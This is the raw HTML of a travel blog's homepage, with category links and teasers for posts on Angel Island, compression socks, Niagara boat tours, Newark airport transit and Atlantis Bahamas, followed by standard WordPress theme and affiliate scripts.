menu-item-object-category menu-item-8223"><a href="https://twotravelingtexans.com/travel-tips/">Travel Tips</a></li><li id="menu-item-8265" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8265"><a href="https://twotravelingtexans.com/blog/">Blog</a></li><li id="menu-item-8225" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-8225"><a href="https://twotravelingtexans.com/about-us/">About Us</a><ul class="sub-menu"><li id="menu-item-8226" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8226"><a href="https://twotravelingtexans.com/about-us/anisa/">Anisa</a></li><li id="menu-item-8227" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8227"><a href="https://twotravelingtexans.com/about-us/russell-the-other-one/">Russell (The Other One)</a></li><li id="menu-item-8228" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8228"><a href="https://twotravelingtexans.com/about-us/katherine/">Katherine</a></li><li id="menu-item-8230" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8230"><a href="https://twotravelingtexans.com/introduction/">Get to Know Us</a></li></ul></li><li id="menu-item-8231" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8231"><a href="https://twotravelingtexans.com/contact-us/">Contact</a></li></ul><div id="et-mobile-navigation"> <span class="show-menu"><div class="show-menu-button"> <span></span> <span></span> <span></span></div><p>Select Page</p> </span><nav></nav></div></div></div></div></div></header><div id="main-content"><div class="container"><div id="content-area" class=" clearfix"><div class="et_pb_extra_column_main"><article id="post-8232" class="post-8232 page type-page status-publish hentry et-doesnt-have-title_meta"><div class="post-wrap"><div class="post-content entry-content"> <span id="dpsp-post-sticky-bar-markup" data-mobile-size="720"></span><div id="et-boc" class="et-boc"><div class="et_builder_inner_content et_pb_gutters3"> <span id="dpsp-post-content-markup" data-image-pin-it="false"></span><div class="et_pb_section et_pb_section_0 et_pb_fullwidth_section et_section_regular"><section class="et_pb_module et_pb_fullwidth_header et_pb_fullwidth_header_0 et_animated et_pb_header_with_image et_pb_bg_layout_light et_pb_text_align_right et_pb_fullscreen"><div class="et_pb_fullwidth_header_container right"><div class="header-content-container center"><div class="header-content"><h1 class="et_pb_module_header">Vacation Days are Precious</h1> <span class="et_pb_fullwidth_header_subhead">Let us help you make the most of them</span><div class="et_pb_header_content_wrapper"><p style="text-align: center;"><span style="color: #000000;"><strong>Expert Travel Tips  ♦   Inspiration  ♦   Videos</strong></span></p><p style="text-align: center;">It&#8217;s all you need to plan your next trip on a single page!</p></div> <a class="et_pb_button et_pb_more_button et_pb_button_one" href="https://twotravelingtexans.com/free-printable-trip-planning-checklist">Get Your FREE Trip Planning Checklist!</a></div></div><div class="header-image-container center"><div class="header-image"> <img src="https://twotravelingtexans.com/wp-content/uploads/2018/11/transparent-picture-v4.png" alt="" title="" /></div></div></div><div class="et_pb_fullwidth_header_overlay"></div><div class="et_pb_fullwidth_header_scroll"><a href="#"><span class="scroll-down et-pb-icon">&#x3b;</span></a></div></section></div><div class="et_pb_section et_pb_section_1 et_section_regular"><div class="et_pb_row et_pb_row_0"><div class="et_pb_column et_pb_column_4_4 et_pb_column_0 et_pb_css_mix_blend_mode_passthrough et-last-child"><div class="et_pb_module et_pb_text et_pb_text_0 et_pb_bg_layout_light et_pb_text_align_left"><div class="et_pb_text_inner"><p style="text-align: center;"><span style="color: #000080;"><strong>Plan Your Next Vacation Now!</strong></span></p></div></div><div class="et_pb_module et_pb_text et_pb_text_1 et_pb_bg_layout_light et_pb_text_align_left"><div class="et_pb_text_inner"><p style="text-align: center;"><span style="color: #000080;"><strong>Find information to help you decide where to go and what to do.</strong></span></p></div></div></div></div><div class="et_pb_row et_pb_row_1"><div class="et_pb_column et_pb_column_1_4 et_pb_column_1 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_blurb et_pb_blurb_0 et_pb_bg_layout_light et_pb_text_align_left et_pb_blurb_position_left"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://twotravelingtexans.com/adventure"><span class="et_pb_image_wrap"><span class="et-pb-icon et-waypoint et_pb_animation_off">&#xe0de;</span></span></a></div><div class="et_pb_blurb_container"><h4 class="et_pb_module_header"><a href="https://twotravelingtexans.com/adventure">Adventure Travel</a></h4><div class="et_pb_blurb_description"></div></div></div></div><div class="et_pb_module et_pb_blurb et_pb_blurb_1 et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_left"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://twotravelingtexans.com/roadtrips"><span class="et_pb_image_wrap"><span class="et-pb-icon et-waypoint et_pb_animation_off">&#xe0de;</span></span></a></div><div class="et_pb_blurb_container"><h4 class="et_pb_module_header"><a href="https://twotravelingtexans.com/roadtrips">Road Trips</a></h4><div class="et_pb_blurb_description"></div></div></div></div></div><div class="et_pb_column et_pb_column_1_4 et_pb_column_2 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_blurb et_pb_blurb_2 et_pb_bg_layout_light et_pb_text_align_left et_pb_blurb_position_left"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://twotravelingtexans.com/day-trips"><span class="et_pb_image_wrap"><span class="et-pb-icon et-waypoint et_pb_animation_off">&#xe0de;</span></span></a></div><div class="et_pb_blurb_container"><h4 class="et_pb_module_header"><a href="https://twotravelingtexans.com/day-trips">Day Trips</a></h4><div class="et_pb_blurb_description"></div></div></div></div><div class="et_pb_module et_pb_blurb et_pb_blurb_3 et_pb_bg_layout_light et_pb_text_align_left et_pb_blurb_position_left"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://twotravelingtexans.com/beach"><span class="et_pb_image_wrap"><span class="et-pb-icon et-waypoint et_pb_animation_off">&#xe0de;</span></span></a></div><div class="et_pb_blurb_container"><h4 class="et_pb_module_header"><a href="https://twotravelingtexans.com/beach">Beach Getaways</a></h4><div class="et_pb_blurb_description"></div></div></div></div></div><div class="et_pb_column et_pb_column_1_4 et_pb_column_3 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_blurb et_pb_blurb_4 et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_left"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://twotravelingtexans.com/food"><span class="et_pb_image_wrap"><span class="et-pb-icon et-waypoint et_pb_animation_off">&#xe0de;</span></span></a></div><div class="et_pb_blurb_container"><h4 class="et_pb_module_header"><a href="https://twotravelingtexans.com/food">Food Excursions</a></h4><div class="et_pb_blurb_description"></div></div></div></div><div class="et_pb_module et_pb_blurb et_pb_blurb_5 et_pb_bg_layout_light et_pb_text_align_left et_pb_blurb_position_left"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://twotravelingtexans.com/museum"><span class="et_pb_image_wrap"><span class="et-pb-icon et-waypoint et_pb_animation_off">&#xe0de;</span></span></a></div><div class="et_pb_blurb_container"><h4 class="et_pb_module_header"><a href="https://twotravelingtexans.com/museum">Museums</a></h4><div class="et_pb_blurb_description"></div></div></div></div></div><div class="et_pb_column et_pb_column_1_4 et_pb_column_4 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_blurb et_pb_blurb_6 et_pb_bg_layout_light et_pb_text_align_left et_pb_blurb_position_left"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://twotravelingtexans.com/castles"><span class="et_pb_image_wrap"><span class="et-pb-icon et-waypoint et_pb_animation_off">&#xe0de;</span></span></a></div><div class="et_pb_blurb_container"><h4 class="et_pb_module_header"><a href="https://twotravelingtexans.com/castles">Castles</a></h4><div class="et_pb_blurb_description"></div></div></div></div><div class="et_pb_module et_pb_blurb et_pb_blurb_7 et_pb_bg_layout_light et_pb_text_align_left et_pb_blurb_position_left"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://twotravelingtexans.com/sports"><span class="et_pb_image_wrap"><span class="et-pb-icon et-waypoint et_pb_animation_off">&#xe0de;</span></span></a></div><div class="et_pb_blurb_container"><h4 class="et_pb_module_header"><a href="https://twotravelingtexans.com/sports">Sport Travel</a></h4><div class="et_pb_blurb_description"></div></div></div></div></div></div><div class="et_pb_row et_pb_row_2"><div class="et_pb_column et_pb_column_4_4 et_pb_column_5 et_pb_css_mix_blend_mode_passthrough et-last-child"><div class="et_pb_module et_pb_text et_pb_text_2 et_pb_bg_layout_light et_pb_text_align_left"><div class="et_pb_text_inner"><p style="text-align: center;"><span style="color: #000080;">We do all the research and share our experiences so that you don&#8217;t have to spend so much time planning your travel.  Our expert travel tips will help you make the most of your vacation days.</span></p></div></div></div></div></div><div class="et_pb_section et_pb_section_2 et_section_regular"><div class="et_pb_row et_pb_row_3"><div class="et_pb_column et_pb_column_1_4 et_pb_column_6 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_image et_pb_image_0 et_always_center_on_mobile"> <a href="https://twotravelingtexans.com/destinations-map/"><span class="et_pb_image_wrap "><img src="https://twotravelingtexans.com/wp-content/uploads/2018/01/Destinations-1.jpg" alt="" /></span></a></div></div><div class="et_pb_column et_pb_column_1_4 et_pb_column_7 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_image et_pb_image_1 et_always_center_on_mobile"> <a href="https://twotravelingtexans.com/travel-deals-2/"><span class="et_pb_image_wrap "><img src="https://twotravelingtexans.com/wp-content/uploads/2018/01/Travel-Deals-1.jpg" alt="" /></span></a></div></div><div class="et_pb_column et_pb_column_1_4 et_pb_column_8 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_image et_pb_image_2 et_always_center_on_mobile"> <a href="https://twotravelingtexans.com/kid-friendly"><span class="et_pb_image_wrap "><img src="https://twotravelingtexans.com/wp-content/uploads/2018/01/Kid-friendly-travel-1.jpg" alt="" /></span></a></div></div><div class="et_pb_column et_pb_column_1_4 et_pb_column_9 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_image et_pb_image_3 et_always_center_on_mobile"> <a href="https://twotravelingtexans.com/the-weekly-postcard-linkup/"><span class="et_pb_image_wrap "><img src="https://twotravelingtexans.com/wp-content/uploads/2018/01/Weekly-postcard-1.png" alt="" /></span></a></div></div></div><div class="et_pb_row et_pb_row_4"><div class="et_pb_column et_pb_column_4_4 et_pb_column_10 et_pb_css_mix_blend_mode_passthrough et-last-child"><div class="et_pb_module et_pb_text et_pb_text_3 et_pb_bg_layout_light et_pb_text_align_left"><div class="et_pb_text_inner"><p> <span style="color: #000080;"><strong>Our Recent Updates</strong></span></p></div></div><div class="et_pb_module et_pb_blog_0 custom-blog et_pb_blog_grid_wrapper"><div class="et_pb_blog_grid clearfix et_pb_bg_layout_light "><div class="et_pb_ajax_pagination_container"><div class="et_pb_salvattore_content" data-columns><article id="post-16070" class="et_pb_post clearfix post-16070 post type-post status-publish format-standard has-post-thumbnail hentry category-california category-day-trips et-has-post-format-content et_post_format-et-post-format-standard"><div class="et_pb_image_container"> <a href="https://twotravelingtexans.com/what-to-do-in-angel-island/" class="entry-featured-image-url"> <img src="https://twotravelingtexans.com/wp-content/uploads/2019/04/angel-island-picnic-table-400x250.jpg" alt='What to Do in Angel Island in San Francisco Bay' width='400' height='250' /> </a></div><h2 class="entry-title"><a href="https://twotravelingtexans.com/what-to-do-in-angel-island/">What to Do in Angel Island in San Francisco Bay</a></h2><p class="post-meta">by <span class="author vcard"><a href="https://twotravelingtexans.com/author/anisa462hotmail-com/" title="Posts by Anisa" rel="author">Anisa</a></span> | <span class="published">Apr 30, 2019</span> | <a href="https://twotravelingtexans.com/destinations/north-america/usa/california/" rel="category tag">California</a>, <a href="https://twotravelingtexans.com/day-trips/" rel="category tag">Day Trips</a> | 4 Comments</p><div class="post-content"><p> Looking for an easy day trip from San Francisco? Maybe one with stunning views, beautiful natural scenery, and some history? Angel Island, also known as the “Ellis Island of the West,” is a fantastic option.  It’s only a short ferry ride away.  While the...</p> <a href="https://twotravelingtexans.com/what-to-do-in-angel-island/" class="more-link">read more</a></div></article><article id="post-15975" class="et_pb_post clearfix post-15975 post type-post status-publish format-standard has-post-thumbnail hentry category-travel-tips et-has-post-format-content et_post_format-et-post-format-standard"><div class="et_pb_image_container"> <a href="https://twotravelingtexans.com/best-compression-socks-for-long-flights/" class="entry-featured-image-url"> <img src="https://twotravelingtexans.com/wp-content/uploads/2019/04/plane-691084_1280-1-400x250.jpg" alt='The Best Compression Socks for Long Flights' width='400' height='250' /> </a></div><h2 class="entry-title"><a href="https://twotravelingtexans.com/best-compression-socks-for-long-flights/">The Best Compression Socks for Long Flights</a></h2><p class="post-meta">by <span class="author vcard"><a href="https://twotravelingtexans.com/author/anisa462hotmail-com/" title="Posts by Anisa" rel="author">Anisa</a></span> | <span class="published">Apr 25, 2019</span> | <a href="https://twotravelingtexans.com/travel-tips/" rel="category tag">Travel Tips</a> | 4 Comments</p><div class="post-content"><p> Blood clots should be a real concern to everyone who travels on long flights.  Women who take certain birth control pills are at an even higher risk. Is there an easy way to lower the risk of blood clots when you travel? Yes! Wearing compressions socks has...</p> <a href="https://twotravelingtexans.com/best-compression-socks-for-long-flights/" class="more-link">read more</a></div></article><article id="post-15641" class="et_pb_post clearfix post-15641 post type-post status-publish format-standard has-post-thumbnail hentry category-travel-tips et-has-post-format-content et_post_format-et-post-format-standard"><div class="et_pb_image_container"> <a href="https://twotravelingtexans.com/is-the-dollar-flight-club-worth-it/" class="entry-featured-image-url"> <img src="https://twotravelingtexans.com/wp-content/uploads/2019/04/dollar-flight-club-review-400x250.jpg" alt='Is the Dollar Flight Club Worth it?' width='400' height='250' /> </a></div><h2 class="entry-title"><a href="https://twotravelingtexans.com/is-the-dollar-flight-club-worth-it/">Is the Dollar Flight Club Worth it?</a></h2><p class="post-meta">by <span class="author vcard"><a href="https://twotravelingtexans.com/author/anisa462hotmail-com/" title="Posts by Anisa" rel="author">Anisa</a></span> | <span class="published">Apr 11, 2019</span> | <a href="https://twotravelingtexans.com/travel-tips/" rel="category tag">Travel Tips</a> | 22 Comments</p><div class="post-content"><p> One of the biggest barriers to taking that dream vacation is the cost of flights.  Often the cost of a plane ticket takes the biggest chunk of your travel budget. It’s important to get the best deals on flights to keep costs down so that you can travel...</p> <a href="https://twotravelingtexans.com/is-the-dollar-flight-club-worth-it/" class="more-link">read more</a></div></article></div><nav class="post-nav"><div class="nav-links clearfix"><div class="nav-link nav-link-prev"> <a href="https://twotravelingtexans.com/page/2/"><span class="button">Older Entries</span></a></div><div class="nav-link nav-link-next"></div></div></nav></div></div></div></div></div><div class="et_pb_row et_pb_row_5"><div class="et_pb_column et_pb_column_4_4 et_pb_column_11 et_pb_css_mix_blend_mode_passthrough et-last-child"><div class="et_pb_module et_pb_text et_pb_text_4 et_pb_bg_layout_light et_pb_text_align_left"><div class="et_pb_text_inner"><p> <span style="color: #000080;"><strong>Our Most Popular Posts</strong></span></p></div></div><div class="et_pb_module et_pb_blog_1 custom-blog et_pb_blog_grid_wrapper"><div class="et_pb_blog_grid clearfix et_pb_bg_layout_light "><div class="et_pb_ajax_pagination_container"><div class="et_pb_salvattore_content" data-columns><article id="post-5150" class="et_pb_post clearfix post-5150 post type-post status-publish format-standard has-post-thumbnail hentry category-adventure category-canada category-kid-friendly category-most-popular-posts tag-boat-tour tag-canada tag-niagara-falls tag-travel et-has-post-format-content et_post_format-et-post-format-standard"><div class="et_pb_image_container"> <a href="https://twotravelingtexans.com/hornblower-niagara-cruises-vs-maid-mist/" class="entry-featured-image-url"> <img src="https://twotravelingtexans.com/wp-content/uploads/2018/01/hornblower-2-768x576-400x250.jpg" alt='Hornblower Niagara Cruises Vs Maid of the Mist' width='400' height='250' /> </a></div><h2 class="entry-title"><a href="https://twotravelingtexans.com/hornblower-niagara-cruises-vs-maid-mist/">Hornblower Niagara Cruises Vs Maid of the Mist</a></h2><p class="post-meta">by <span class="author vcard"><a href="https://twotravelingtexans.com/author/anisa462hotmail-com/" title="Posts by Anisa" rel="author">Anisa</a></span> | <span class="published">Sep 27, 2017</span> | <a href="https://twotravelingtexans.com/adventure/" rel="category tag">Adventure</a>, <a href="https://twotravelingtexans.com/destinations/north-america/canada/" rel="category tag">Canada</a>, <a href="https://twotravelingtexans.com/kid-friendly/" rel="category tag">Kid Friendly</a>, <a href="https://twotravelingtexans.com/most-popular-posts/" rel="category tag">Most Popular Posts</a> | 72 Comments</p><div class="post-content"><p> Before I even started planning a trip to Niagara Falls, I knew I wanted to do the Maid of the Mist boat ride.  It’s the iconic thing to do, right? Well, once I started doing my research, I learned there is also the option of doing Hornblower Niagara...</p> <a href="https://twotravelingtexans.com/hornblower-niagara-cruises-vs-maid-mist/" class="more-link">read more</a></div></article><article id="post-3637" class="et_pb_post clearfix post-3637 post type-post status-publish format-standard has-post-thumbnail hentry category-most-popular-posts category-new-york-city category-travel-tips tag-air-travel tag-budget-travel tag-nyc tag-travel tag-travel-tips tag-traveling-between-manhattan-and-newark-airport et-has-post-format-content et_post_format-et-post-format-standard"><div class="et_pb_image_container"> <a href="https://twotravelingtexans.com/traveling-between-manhattan-and-newark-airport-ewr/" class="entry-featured-image-url"> <img src="https://twotravelingtexans.com/wp-content/uploads/2018/01/newark-768x623-400x250.jpg" alt='The Best Options for Traveling Between Manhattan and Newark Airport (EWR)' width='400' height='250' /> </a></div><h2 class="entry-title"><a href="https://twotravelingtexans.com/traveling-between-manhattan-and-newark-airport-ewr/">The Best Options for Traveling Between Manhattan and Newark Airport (EWR)</a></h2><p class="post-meta">by <span class="author vcard"><a href="https://twotravelingtexans.com/author/anisa462hotmail-com/" title="Posts by Anisa" rel="author">Anisa</a></span> | <span class="published">Feb 7, 2017</span> | <a href="https://twotravelingtexans.com/most-popular-posts/" rel="category tag">Most Popular Posts</a>, <a href="https://twotravelingtexans.com/destinations/north-america/usa/new-york-city/" rel="category tag">New York City</a>, <a href="https://twotravelingtexans.com/travel-tips/" rel="category tag">Travel Tips</a> | 26 Comments</p><div class="post-content"><p>&nbsp; Since people really appreciated our tips on how to get to JFK airport, I thought I should also share some of my thoughts on the options for traveling between Manhattan and Newark Airport (EWR).  Sometimes the best flight options involve travel from EWR....</p> <a href="https://twotravelingtexans.com/traveling-between-manhattan-and-newark-airport-ewr/" class="more-link">read more</a></div></article><article id="post-294" class="et_pb_post clearfix post-294 post type-post status-publish format-standard has-post-thumbnail hentry category-accommodations category-beach category-kid-friendly category-most-popular-posts category-the-bahamas tag-atlantis tag-bahamas tag-beach tag-food tag-travel tag-water-park et-has-post-format-content et_post_format-et-post-format-standard"><div class="et_pb_image_container"> <a href="https://twotravelingtexans.com/atlantis-bahamas/" class="entry-featured-image-url"> <img src="https://twotravelingtexans.com/wp-content/uploads/2015/08/atlantis-featured-image-1-400x250.png" alt='The Secrets of Atlantis in the Bahamas' width='400' height='250' /> </a></div><h2 class="entry-title"><a href="https://twotravelingtexans.com/atlantis-bahamas/">The Secrets of Atlantis in the Bahamas</a></h2><p class="post-meta">by <span class="author vcard"><a href="https://twotravelingtexans.com/author/anisa462hotmail-com/" title="Posts by Anisa" rel="author">Anisa</a></span> | <span class="published">Aug 25, 2015</span> | <a href="https://twotravelingtexans.com/accommodations/" rel="category tag">Accommodations</a>, <a href="https://twotravelingtexans.com/beach/" rel="category tag">Beach</a>, <a href="https://twotravelingtexans.com/kid-friendly/" rel="category tag">Kid Friendly</a>, <a href="https://twotravelingtexans.com/most-popular-posts/" rel="category tag">Most Popular Posts</a>, <a href="https://twotravelingtexans.com/destinations/caribbean/the-bahamas/" rel="category tag">The Bahamas</a> | 55 Comments</p><div class="post-content"><p>One of my best friends decided she wanted to celebrate her milestone birthday with a girls trip to Atlantis Bahamas.  She has been such a good friend to me, I would have gone just about anywhere to help her celebrate. The trip far exceeded my expectations and we all...</p> <a href="https://twotravelingtexans.com/atlantis-bahamas/" class="more-link">read more</a></div></article></div><nav class="post-nav"><div class="nav-links clearfix"><div class="nav-link nav-link-prev"></div><div class="nav-link nav-link-next"></div></div></nav></div></div></div></div></div></div></div></div><span class="et_bloom_bottom_trigger"></span></div></div></article></div></div></div></div><footer id="footer" class="footer_columns_3"><div class="container"><div class="et_pb_extra_row container-width-change-notify"><div class="et_pb_extra_column even column-2"><div id="text-15" class="et_pb_widget widget_text"><h4 class="widgettitle"></h4><div class="textwidget"><p><a href="https://twotravelingtexans.com/about-us/disclaimer-privacy-policy/" rel="">Disclaimer and Privacy Policy</a></p></div></div></div></div></div><div id="footer-bottom"><div class="container"><p id="footer-info">Designed by <a href="https://www.elegantthemes.com" title="Premium WordPress Themes">Elegant Themes</a> | Powered by <a href="https://www.wordpress.org">WordPress</a></p></div></div></footer></div><div style="display:none"></div> <script type="text/javascript">var et_animation_data = [{"class":"et_pb_fullwidth_header_0","style":"bounce","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"}];</script> <script type="text/javascript">amzn_assoc_ad_type = "link_enhancement_widget"; amzn_assoc_tracking_id = "twotravtexa-20"; amzn_assoc_linkid = "0684ce044a6fdb1c2b5435164dad5979"; amzn_assoc_placement = ""; amzn_assoc_marketplace = "amazon"; amzn_assoc_region = "US";</script> <script src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&amp;Operation=GetScript&amp;ID=OneJS&amp;WS=1&amp;MarketPlace=US"></script><link rel='stylesheet' id='et-gf-open-sans-css' href='https://fonts.googleapis.com/css?family=Open+Sans:400,700' type='text/css' media='all' /> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js'></script> <script type='text/javascript'>/* */ var thirsty_global_vars = {"home_url":"\/\/twotravelingtexans.com","ajax_url":"https:\/\/twotravelingtexans.com\/wp-admin\/admin-ajax.php","link_fixer_enabled":"yes","link_prefix":"recommends","link_prefixes":{"1":"recommends"},"post_id":"8232","enable_record_stats":"yes","enable_js_redirect":"yes","disable_thirstylink_class":""}; /* */</script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-content/plugins/thirstyaffiliates/js/app/ta.js'></script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-includes/js/masonry.min.js'></script> <script type='text/javascript'>/* */ var EXTRA = {"images_uri":"https:\/\/twotravelingtexans.com\/wp-content\/themes\/Extra\/images\/","ajaxurl":"https:\/\/twotravelingtexans.com\/wp-admin\/admin-ajax.php","your_rating":"Your Rating:","item_in_cart_count":"%d Item in Cart","items_in_cart_count":"%d Items in Cart","item_count":"%d Item","items_count":"%d Items","rating_nonce":"0123d13f2c","timeline_nonce":"3a9704624f","blog_feed_nonce":"3604dccc4c","error":"There was a problem, please try again.","contact_error_name_required":"Name field cannot be empty.","contact_error_email_required":"Email field cannot be empty.","contact_error_email_invalid":"Please enter a valid email address.","is_ab_testing_active":"","is_cache_plugin_active":"no"}; var et_shortcodes_strings = {"previous":"Previous","next":"Next"}; var et_pb_custom = {"ajaxurl":"https:\/\/twotravelingtexans.com\/wp-admin\/admin-ajax.php","images_uri":"https:\/\/twotravelingtexans.com\/wp-content\/themes\/Extra\/images","builder_images_uri":"https:\/\/twotravelingtexans.com\/wp-content\/themes\/Extra\/includes\/builder\/images","et_frontend_nonce":"5554c1da32","subscription_failed":"Please, check the fields below to make sure you entered the correct information.","et_ab_log_nonce":"6550e2964f","fill_message":"Please, fill in the following fields:","contact_error_message":"Please, fix the following errors:","invalid":"Invalid email","captcha":"Captcha","prev":"Prev","previous":"Previous","next":"Next","wrong_captcha":"You entered the wrong number in captcha.","ignore_waypoints":"no","is_divi_theme_used":"","widget_search_selector":".widget_search","is_ab_testing_active":"","page_id":"8232","unique_test_id":"","ab_bounce_rate":"5","is_cache_plugin_active":"no","is_shortcode_tracking":"","tinymce_uri":""}; var et_pb_box_shadow_elements = []; /* */</script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-content/themes/Extra/scripts/scripts.min.js'></script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-content/plugins/official-mailerlite-sign-up-forms/assets/js/jquery.validate.min.js'></script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-content/themes/Extra/core/admin/js/common.js'></script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript'>var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}};</script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js'></script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js'></script> <script type='text/javascript'>/* */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* */</script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-includes/js/mediaelement/wp-mediaelement.min.js'></script> <style id="et-builder-module-design-cached-inline-styles">.et_pb_fullwidth_header_0.et_pb_fullwidth_header .header-content h1,.et_pb_fullwidth_header_0.et_pb_fullwidth_header .header-content h2.et_pb_module_header,.et_pb_fullwidth_header_0.et_pb_fullwidth_header .header-content h3.et_pb_module_header,.et_pb_fullwidth_header_0.et_pb_fullwidth_header .header-content h4.et_pb_module_header,.et_pb_fullwidth_header_0.et_pb_fullwidth_header .header-content h5.et_pb_module_header,.et_pb_fullwidth_header_0.et_pb_fullwidth_header .header-content h6.et_pb_module_header{font-family:'Arimo',Helvetica,Arial,Lucida,sans-serif;text-transform:none;font-size:31px;color:#ffffff!important;line-height:1.5em;text-align:center;text-shadow:0em 0.1em 0.1em rgba(0,0,0,0.4)}.et_pb_blurb_7.et_pb_blurb h4,.et_pb_blurb_7.et_pb_blurb h4 a,.et_pb_blurb_7.et_pb_blurb h1.et_pb_module_header,.et_pb_blurb_7.et_pb_blurb h1.et_pb_module_header a,.et_pb_blurb_7.et_pb_blurb h2.et_pb_module_header,.et_pb_blurb_7.et_pb_blurb h2.et_pb_module_header a,.et_pb_blurb_7.et_pb_blurb h3.et_pb_module_header,.et_pb_blurb_7.et_pb_blurb h3.et_pb_module_header a,.et_pb_blurb_7.et_pb_blurb h5.et_pb_module_header,.et_pb_blurb_7.et_pb_blurb h5.et_pb_module_header a,.et_pb_blurb_7.et_pb_blurb h6.et_pb_module_header,.et_pb_blurb_7.et_pb_blurb h6.et_pb_module_header a{text-transform:none;font-size:17px;text-align:left}.et_pb_blurb_4.et_pb_blurb{font-size:20px}.et_pb_blurb_4 .et-pb-icon{font-size:22px;color:#100a75}.et_pb_blurb_5.et_pb_blurb h4,.et_pb_blurb_5.et_pb_blurb h4 a,.et_pb_blurb_5.et_pb_blurb h1.et_pb_module_header,.et_pb_blurb_5.et_pb_blurb h1.et_pb_module_header a,.et_pb_blurb_5.et_pb_blurb h2.et_pb_module_header,.et_pb_blurb_5.et_pb_blurb h2.et_pb_module_header a,.et_pb_blurb_5.et_pb_blurb h3.et_pb_module_header,.et_pb_blurb_5.et_pb_blurb 